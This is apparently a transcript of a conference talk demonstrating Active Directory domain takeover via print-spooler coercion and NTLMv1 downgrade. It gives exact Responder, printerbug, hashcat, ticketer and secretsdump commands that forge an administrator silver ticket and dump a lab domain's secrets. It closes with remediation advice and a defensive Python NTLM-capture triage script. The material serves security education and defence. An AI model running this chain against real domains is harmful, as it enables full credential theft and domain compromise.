
I'm going to kick this off with some introductions. I am EvilMog, and this is Domain Compromise Through Print Spoolers. I'm a hacker over at X-Force Red. In fact, let's go pull up my bio over here: I am EvilMog from Team Hashcat, also from X-Force Red. I have a bunch of certs, you probably don't care about those, and I have a black badge collection addiction. I've presented at multiple conferences, and I can be Twitter-stalked at evil_mog. Easy enough. So while we're here, see if I can type today: we're here to talk about the NTLM version 1 packet and why we can abuse it to take over a domain controller.
Basically, what this attack demonstrates is that you, as an attacker, can send a printer request via the MS-RPRN print spooler notify service to a domain controller. That domain controller then sends you back a notification of all of your printers. Now, this is an authenticated request; you need domain user credentials. The cool part is that, because the DC is connecting back to you, you can force it to authenticate, and when it authenticates, it authenticates with its domain controller machine credentials. So if you can get it to connect back to you with an NTLM version 1 response, we're about to demo how we can reverse this. First, though, the
settings that actually apply to this are set in Group Policy. If you want to find these settings, you can go to Computer Configuration, Windows Settings, Security Settings, Local Policies, Security Options, or this entry in the registry. In order for this attack to work, you need to have one of the following settings set. These settings were typically set on domain controllers that were built as Server 2003 and then migrated, back when we had things like Windows XP, Windows NT, Windows 2000, etc. So the setting "Send LM and NTLM responses" is, you know, kind of bad; even worse if you're sending an LM response back. On settings 0, 1 or 2,
any one of these should be suitable for you to attack. Now, the evil part is that some people have set what's called mode 2, which requires, or rather disables, the LAN Manager authentication portion. Okay, no worries, that's easy enough; we can still break that with the SSP, which I'm going to demo in a few moments. So first, let's look at an NTLM version 1 response. Right now this is a complete message; we're going to break it out. In the first part of this you're going to see the domain controller, which is the machine account we're authenticating with; the domain we're authenticating with; this is what's called the LAN Manager response; this is the NT response; and this is your
client challenge. Now, you notice all these zeros here. This is what makes reversing NTLM version 1 with SSP to NTLM harder; it stops you using things like crack.sh. So if we look at the LAN Manager response section, you'll notice all those zeros. Okay, that's our primary clue. Here's the NT response, and here's our client challenge. Now, I mentioned something called SSP. SSP is a protection method used to prevent some evil attacks against NTLM; basically it prevents the use of rainbow tables by modifying the client challenge. So if we look at our LAN Manager response above, we only really care about the significant portions of it, minus all the zeros. Then we care about the client challenge, which is set in an NTLM version 1,
which is, you know, the client's nonce. You combine those together to create what's called the combined challenge, then you MD5 that and take the first 16 characters of that MD5 string, and that basically becomes your new combined challenge. Now, why this is important is that we're about to do some entertaining demos, so let me `cat` my steps while I'm here. First thing we're going to do is pull into Impacket, and we are going to look up the domain SID of the domain we are going to attack. So lookupsid.py, we're going to go mog/evilmog at mog.local; in this case the password is password!, and what we're looking for
is this domain security identifier right here; we're going to use this later. So I'm going to copy that and go `export SID=`. And just to prove I've nothing up my sleeve, I'm going to pull up CrackMapExec and use the user credentials I just typed in, evilmog, -p password!, if I could type today. So no special privileges, nothing scary, we're all nice and good. Next thing I'm going to do is start up Responder with -I, -wrf and -FP, and I'm not doing this with --lm, although you normally would use that for this attack to use crack.sh. I'm going to demonstrate it with hashcat because I feel like living dangerously.
Oops, and make sure you set your Ethernet interface to eth0. Okay, now we're listening. Now we're going to go into krbrelayx from dirkjanm's repo, and in here there is a printerbug tool. So `python3 printerbug.py`, we are then going to go mog/evilmog@dc1.mog.local 192.168..., which is my attacker machine's IP. We're going to kick this thing off, it's going to ask me for a password, we're going to enter that password, and we'll see here we have a nice shiny NTLM version 1 response. This is perfect. So we'll pull up a tool that I wrote called the ntlmv1-multi tool. We're going to run python, or python3, sorry, because I updated it
recently: ntlmv1.py --ntlmv1, we're going to paste our results in here and hit enter.
There, now we're good. So what the ntlmv1 multi-tool does is split up your hash into components that can be used for cracking it, or reversing it technically, using DES mode 14000, into a hash. So what we're going to do is, because this has SSP, it tells us: here's your current client challenge, here's the significant portions of the LAN Manager response, here's your nice and shiny combined challenge, here's the MD5 hash of the combined challenge. Now, why this is important is that the new client challenge that we use for cracking purposes is this SRV challenge, which is the first 16 characters of this MD5 hash. Okay, easy enough. So I have a nice little tool in this to
make my life a little easier. So what we're going to do is type in --hashcat and give it my hashcat path, which is ~/git/hashcat/hashcat, yes, I have it double nested, and we're going to tell it where the utils are, and that is going to be ~/git/hashcat/hashcat-utils/src, again because I am lazy. So now if we go find out the last four characters of the NTLM hash of the domain controller machine account, we just copy straight out of the tool. What this does is use the hashcat-utils ct3_to_ntlm.bin, properly formatted, to extract the last four characters, because we'll just crack it
in real time. Next thing we're going to do is `rm 14000.hash`, which is my last one. All you do is copy these two components to use hashcat's mode 14000. Also, I should point out that if you want to use crack.sh, we do output crack.sh tokens using the tool, so you can save yourself some time and/or money, but if you happen to have a cluster this works just as well. So now that we've input this, it tells you exactly how to crack this with hashcat, but in my case, because I already have the keys, I'm going to make this a little bit different. I'm just going to copy the
first bit of this, I'm going to go -a 0, des.cand, and dash, there we go, that should work, and then it's 1400, or 14000.hash. Oops, got those in the wrong order, that happens. It's actually, there we go, 14000.hash des.cand. Voila, we've now cracked the hash. So if we go back to our original tool, if you use the output that it gives you, you have to go crack with hashcat; it'll say hey, this thing's already been cracked. Oh, and because I'm using csh you've got to put quotes around it, no biggie. Yep, see, I already cracked it. So we go to --show, and now right here we have the DES
key. This is effectively the DES known-plaintext attack; you need to convert this DES key into an NTLM hash. So what we're going to do is go ~/git/hashcat/hashcat-utils, des, one sec, src/des, that's why, hashcat-utils/src/deskey_to_ntlm. We'll copy this first portion, there's part one, here is part two, and then, like I said, we copied out this piece from our ct3, which we need to get the last four digits. There we go. So our NTLM hash of the domain controller's machine account is basically this. Now, what can you do with a domain controller machine account hash?
Well, let's go create a silver ticket with it. So I'm going to copy that, go back to my initial box, we're going to go export, Ctrl-U, `export NTHASH=`, all right. And let's go verify that this is actually correct: crackmapexec smb 192.168.1.3 -u 'DC1$', the dollar sign is its machine account name, -H $NTHASH. Bingo, so now we've verified that this machine account hash is correct. Now we need to create a ticket with it, so we use our favorite tool called ticketer. So python3 ticketer.py, we're going to go with -nthash $NTHASH, yeah, we're going to go -domain-sid
$SID, we're going to go with -domain mog.local, -spn host/dc1.mog.local, and we tell it my account is the administrator, administrator. There we go. So the important part about this is that you give it the NT hash of your domain, or your domain machine account, you give it the domain SID, you tell it the domain, then the SPN here is always going to be host/, or not always, but in most cases host/, and then the domain's, or the DNS name of the account you're going to attack. So we're going to hit enter here. Oops, yeah, I missed one thing, change you to a quote.
So we've now actually saved our ticket as administrator.ccache, which is fantastic. I'm going to go export that so it can be used by secretsdump, easy enough. Now we're going to secretsdump this, and this is the moment of truth; hopefully I did not screw this up. Voila, we now have ourselves a dump. You might sometimes have to run it twice, because this has the new Zerologon code that also dumps the plaintext master password of the machine account. Domain machine accounts are 128 characters long, randomly generated in most cases, so they're hard to even display on a terminal, but this will pull it straight out nice and easy. It shows here's the default
password of this component. Here we've got our, you know, straight-out DCSync, and yes, my administrator account and my EvilMog account have the same password of password!, again, great for testing. So that is that component of it. Now let's get back to my agenda. The important part about this is remediation; obviously if you can't remediate this it's not important. So let's go back to, `cat`, all right, let's go clear the screen here, `cat settings`. So if you're setting up your environment, what you really want to do is make sure that you have set that LAN Manager setting. Now let's get the GPO over here, GPO, GPO, `cat registry`:
you want to set this registry area, this registry or security setting, to use a setting of 5. What this does is send only NTLM version 2 responses and refuse LM and NTLM. This is important because it also blocks a number of other attacks that may use the LMv2 field, or if you're using setting 4. This is actually also set in most CIS benchmarks, so go and check your Group Policy settings to make sure this setting right here is set at level 5 in order to stop this attack. Now for the mandatory credits, because I like to give credit to people: the person who discovered this originally was tifkin from SpecterOps,
and it led to a whole series of attack techniques. You can also relay these attacks if you've got, say, do this on Exchange Server; you can silver ticket just a single server if you've found a box using individual settings, it's fairly useful there. And the krbrelayx code was stolen from Dirk-jan Mollema, I can never pronounce his last name right so I apologize, but there's his code. And last but not least, the ntlmv1-multi tool, which I wrote, which is based off of Moxie Marlinspike's research and atom from Team Hashcat's research, is located right here to automate your life. Again, you can use crack.sh because we put out their compatible
tokens, but if you have GPUs hashcat works just fine; this should take about five to seven days on, call it, 16 to 32 GPUs. And with that I will open this up to questions.
I'm requesting the queue, what's that request look like?
All right, do I know any implications of setting this on a DC? So the important part of this is, if you have any really legacy systems, such as Windows 2000, Windows NT, older systems that do not, or that communicate with NTLM version 1, those shouldn't be on your environment anyway. This really was a setting that was used for compatibility back in, I want to say, the early 2000s-ish. Nowadays, now it's 2020, there's no reason to have this applied unless you're linking up something really ancient. Then the second question was from Chris Timmons there: can you force a client to use NTLM even if the GPO is set? There are some techniques such as registry settings, but you already have to have admin on it, so from an attacker's perspective, no. But if you have, say, local admin on a box that you can't Mimikatz, there is the Internal Monologue attack that can speak NTLM version 1, but that wouldn't really apply in this case. Do we have any other questions while we are here? I know this was a really quick whirlwind demonstration.
Oh, and then if you want to know how I created the terminal graphics: that was created with Monodraw for the ASCII art, and then a tool called libsixel for converting PNGs directly into the terminal, so I can avoid PowerPoint.
And that's really about it. I guess more people are joining in, so I could almost do this a second time if people want it.
Bueller? Bueller? Yeah, screw it, let's run this twice, I'm in a good mood. So let's go run this demo again. I'll go back to my initial response. For those of you who literally just joined in, let's do this a second time. So `cat`, I am EvilMog, easy enough; I, you know, do stuff with hashes, I crack things. What we're here to talk about is this particular registry setting, the NTLM, or the LAN Manager compatibility level, and how it can take down your environment because of the print spooler. So the settings we were talking about, again, which we were talking about here, the vulnerable settings: if you have any of these three
settings set, "Send LM and NTLM responses", "Send LM and NTLM, but use NTLMv2 if negotiated", or "Send NTLM response only", any of these three settings will make this attack work. So we're looking at a standard NTLMv1 response, or the process of how this works. Basically, how this works is we have our attacker, who is going to send a printer request to a domain controller. And by the way, the print spooler runs on every computer by default, including your domain controllers, so you may want to disable the print spooler on security-sensitive systems. If you disable the print spooler service, however, it will prevent a service that updates clients on their domain controller on their
existing printers, so it will cause some domain functionality breaks. But yeah, the way this works is the attacker sends a printer request to the domain controller, or any other server for that matter; it replies back with "here's your printer list", and on that printer list notify-back we send an NTLM challenge to the domain controller. If it sends an NTLM version 1 response back, we're basically in business. The way a v1 response looks is we have this blob that comes back. In it is your domain controller, which is basically your machine account name in this case; you have your domain name, which fills the name of the host name; we have a LAN Manager response, which is this
section right here. Note that this is using something called SSP, which is a protection method used to prevent rainbow tables on the NTLM version 1 response. If you use crack.sh to crack these, it costs about 200 bucks and takes about three days; if you have a hashcat cluster of about 16 GTX 1080s you can do it in anywhere from three to five days, all the way up to seven. This is the NT response field, which is the second portion of it, and this is your client challenge. Now, this gets modified because we are using SSP. So again, here's our LAN Manager response, here is the NT response, here is the client challenge. Now, the way SSP works is
the client challenge that you set as the challenger gets modified. So what we do is we take the significant portions of the LAN Manager response before the zeros, we take the client challenge, we combine them together to create what's called a combined challenge, you then run MD5 over that combined challenge and take the first 16 characters. That gives you your new modified challenge. So in order to demo this whole thing, what we're going to do is, we're going to go clear, I'm going to clear this, we're going to go `cat steps` because I write this stuff down, and we're going to go, first of all, we're going to look up the domain SID. This is the most important step of this, because without the domain SID we can't afford ourselves a silver ticket. So lookupsid.py mog/evilmog@mog.local,
lookupsid, all right. So my password in this case is password!, just to make life easy, and we see here our domain SID is this; this is the security identifier of the domain. We're going to export this so I don't have to remember it later. And to prove I've got nothing up my sleeve, crackmapexec smb 192.168.1.3 -u evilmog -p password!, so I'm not cheating. This shows a regular green, I've got no special admin privileges, we are good to go in that regard. So from here I'm going to kick off Responder, and we're going to do this without --lm because I feel like being
unique. So what we're doing is we're running Responder on our eth0, and we're telling it to wait for a challenge. I'm also going to do this: Responder.db, and delete that database. That's because what it does is it'll cache the challenge it's received and stop issues. Now I've got myself a random, so it shouldn't cause problems, but for demo purposes clear your Responder DB because that's reasonably important. Now we're going to go into the krbrelayx demo, we're going to run python3 printerbug.py, we use mog, which is my domain name, I'm going to do this: evilmog@dc1.mog.local 192.168.1.128, which is my attacker IP. It's going to send me an effect, or send an
authentication to the host. I'm going to type my password in here; it's going to authenticate back to me as the domain controller, and this NTLM version 1 has changed, which is fantastic. So what we're going to do is take this NTLM version 1 and put it into the ntlmv1 multi-tool. So python3 ntlmv1.py --ntlmv1, type my stuff in here. Now we're also going to go --hashcat and tell it my hashcat path, which in this case is ~/git/hashcat/hashcat, and then we tell it where my hashcat utilities are, which is going to be ~/git/hashcat/hashcat-utils. All right, cool. So now we need to go
figure out how to crack this hash. So I'm going to go rm my 14000.hash, and I'm going to echo out what the tool gives me. Now, what this is, this is basically a DES known-ciphertext, or DES known-plaintext, attack, and the key that we generate out of this from hashcat is then going to get converted into the NTLM hash. So we've now set up our component. Now, because I already know what the passphrase is, or the hash is, on this, I'm going to just make our lives easy: -m 14000, attack mode 0, we're going to go 14000.hash, we're going to go des.cand, and let this go. All right, cool.
So we've cracked this. Now we're going back to our original output to prove that I'm not lying in my tool; we're just going to type this out as-is. Now, because I'm using zsh I need to wrap my mask in quotes. So see here, we've already cracked all our hashes, so we're going to show those now. So here are the components of our password hash. First thing we're going to do is go ~/git/hashcat-utils/src, ct3, or we're going to add deskey_to_ntlm, and we take this component inside the hex: there is part one, there is part two, and now the last, most important part, we're going to crack ct3 using the tool's output, so this will give you the last four characters. Oops, I set my path wrong, that's fine. src, there we go, so bb0, so our hash winds up looking like this,
this, this. So I'm going to copy that, I'm going to go `export NTHASH=` that, and this is now our NT hash, perfect. So now the next part of this whole thing is we're going to go create a silver ticket. The tool in the Impacket utilities is ticketer, so ./ticketer.py, we are going to go -nthash $NTHASH, -domain-sid $SID, -domain is going to be evil, or mog.local, wrong domain, we're going to go -spn, which is going to be host/dc1.mog.local.com, and then we are going to go with the administrator user. Who isn't admit, lowercase in the SPN, my bad.
There we go, so we've saved our ticket to administrator.ccache. Now what you need to do is run an export on this, a KRB5CCNAME like this, tell it where our ccache is, and then we're going to run secretsdump with -k and -no-pass; that way it uses a Kerberos ticket to secretsdump the DC. And here we are, so we've now secretsdumped the DC. Occasionally my version blows up because I've got it set up for Zerologon, but now it actually pulls up a second time. So you'll see here we have our SAM from this, before this is a DC, or DPAPI, and you have your full proper secretsdump, relatively easy. So if we go back to our agenda, `cat agenda`, so the tools we used for this were the ntlmv1 multi-tool, whoops, `cat` onto four.
This was discovered by a couple of awesome people. Lee Christensen discovered the original print spooler MS-RPRN exploit vector; Dirk-jan Mollema is the one who wrote krbrelayx as well as a lot of the good Zerologon code, so we abuse a lot of that. If you want to remediate this, you want to be running on compatibility level 5 from that registry key we mentioned earlier, and again, that registry entry, or that policy location, registry entry, was right here, and that gives you just about everything we need. Again, I have been EvilMog, thank you for watching, for coming to my talk. Do we have any questions?
And everyone caught it that time, right?
Cool, well, thank you all folks for coming. That's been, um, is there an advantage to reducing the machine password refresh interval? There is and there isn't. So basically, with the machine password refresh, I've seen people reducing it down to as low as a week, and that's handy for when your machine gets compromised, and it reduces the duration of silver tickets. So it won't hurt anything; it may not stop this particular attack, but it'll definitely reduce the time that attackers are in. So I do encourage a reduction; obviously do your own risk analysis of what it might cause for systems. If you have a fairly reliable network with decent DCs it should not be a problem. If your time frame is set too low and a machine's not online, it will just check it and expire it when it signs on, as opposed to, you know, automatically expiring it, so the risk level is minimal. Yeah, let me go find the link for that, chat, bear with me here, LM, a sec, it's LM compatibility level, I usually have to Google for this every single time. So what you want to do is go into this link right here, and that tells you all about the LAN Manager compatibility level. Also make sure you disable your print spooler on your domain controllers as well as your Exchange servers and anything else that you consider seriously sensitive, or don't want me to look at wrong. Anybody else? Cool, well, thank you all then. I'm going to stop my video and screen share, and I can answer questions; feel free to reach out on Twitter, I've got no problem answering questions on there, that's generally the primary way of doing things for me, and if you have anything else feel free to reach out.
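As an added example (not code from the talk, from Responder, or from the ntlmv1-multi tool), the following Python triage routine takes a Responder-style NTLM hash line, tells NTLMv1 from NTLMv2, flags the zero-padded LM field that marks SSP (ESS) use, and recomputes the modified challenge the talk describes: MD5 over the concatenated challenges, first 16 hex characters. In MS-NLMP terms the last field of the Responder line is the challenge the listener issued and the non-zero prefix of the LM field is the client nonce; the sample lines below are constructed, and the `describe()` wording and data class are my own.

```python
import hashlib
import re
from dataclasses import dataclass

# Constructed samples in the shape Responder prints: NTLMv1 lines are
# USER::DOMAIN:LMRESP(48 hex):NTRESP(48 hex):CHALLENGE(16 hex); NTLMv2 lines are
# USER::DOMAIN:CHALLENGE(16 hex):NTPROOF(32 hex):BLOB(longer). Values are made up.
SAMPLE_NTLMV1_ESS = ("DC1$::MOG:" + "0a1b2c3d4e5f6071" + "0" * 32 + ":"
                     + "a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718:"
                     + "1122334455667788")
SAMPLE_NTLMV1_PLAIN = "DC1$::MOG:" + "c3" * 24 + ":" + "d4" * 24 + ":1122334455667788"
SAMPLE_NTLMV2 = "evilmog::MOG:1122334455667788:" + "ab" * 16 + ":0101000000000000" + "00" * 24

HEX = re.compile(r"^[0-9a-fA-F]*$")


@dataclass
class NtlmCapture:
    user: str
    domain: str
    version: int              # 1 or 2
    ess: bool                 # NTLMv1 with SSP/ESS (NTLM2 session security)
    server_challenge: str     # challenge the listener issued, hex
    client_nonce: str         # non-zero prefix of the LM field when ess, else ""
    effective_challenge: str  # challenge the NT response was really computed against


def ess_challenge(server_challenge_hex: str, client_nonce_hex: str) -> str:
    """MS-NLMP NTLM2 session: MD5(ServerChallenge || ClientChallenge), first 8 bytes."""
    combined = bytes.fromhex(server_challenge_hex) + bytes.fromhex(client_nonce_hex)
    if len(combined) != 16:
        raise ValueError("expected two 8-byte challenges")
    return hashlib.md5(combined).hexdigest()[:16]


def parse_capture(line: str) -> NtlmCapture:
    """Classify one Responder hash line; raise ValueError on anything else."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a Responder-style NTLM line")
    user, _, domain, f3, f4, f5 = parts
    if not all(HEX.match(f) for f in (f3, f4, f5)):
        raise ValueError("non-hex response field")
    if len(f3) == 48 and len(f4) == 48 and len(f5) == 16:
        lm, server_challenge = f3.lower(), f5.lower()
        # ESS: LM field is an 8-byte client nonce followed by 16 zero bytes.
        ess = lm[16:] == "0" * 32 and lm[:16] != "0" * 16
        nonce = lm[:16] if ess else ""
        effective = ess_challenge(server_challenge, nonce) if ess else server_challenge
        return NtlmCapture(user, domain, 1, ess, server_challenge, nonce, effective)
    if len(f3) == 16 and len(f4) == 32 and len(f5) > 32:
        return NtlmCapture(user, domain, 2, False, f3.lower(), "", f3.lower())
    raise ValueError("unrecognised field lengths")


def is_machine_account(user: str) -> bool:
    return user.endswith("$")


def describe(capture: NtlmCapture) -> str:
    """One-line verdict for a SOC note on a captured authentication."""
    who = "machine account" if is_machine_account(capture.user) else "user account"
    name = f"{capture.domain}\\{capture.user}"
    if capture.version == 2:
        return f"NTLMv2 from {who} {name}: not affected by the NTLMv1 weakness"
    mode = "with SSP/ESS (zero-padded LM field)" if capture.ess else "without SSP/ESS"
    return (f"NTLMv1 {mode} from {who} {name}: host still sends LM/NTLM responses "
            f"(LmCompatibilityLevel 0, 1 or 2); effective challenge {capture.effective_challenge}")


if __name__ == "__main__":
    for sample in (SAMPLE_NTLMV1_ESS, SAMPLE_NTLMV1_PLAIN, SAMPLE_NTLMV2):
        print(describe(parse_capture(sample)))
```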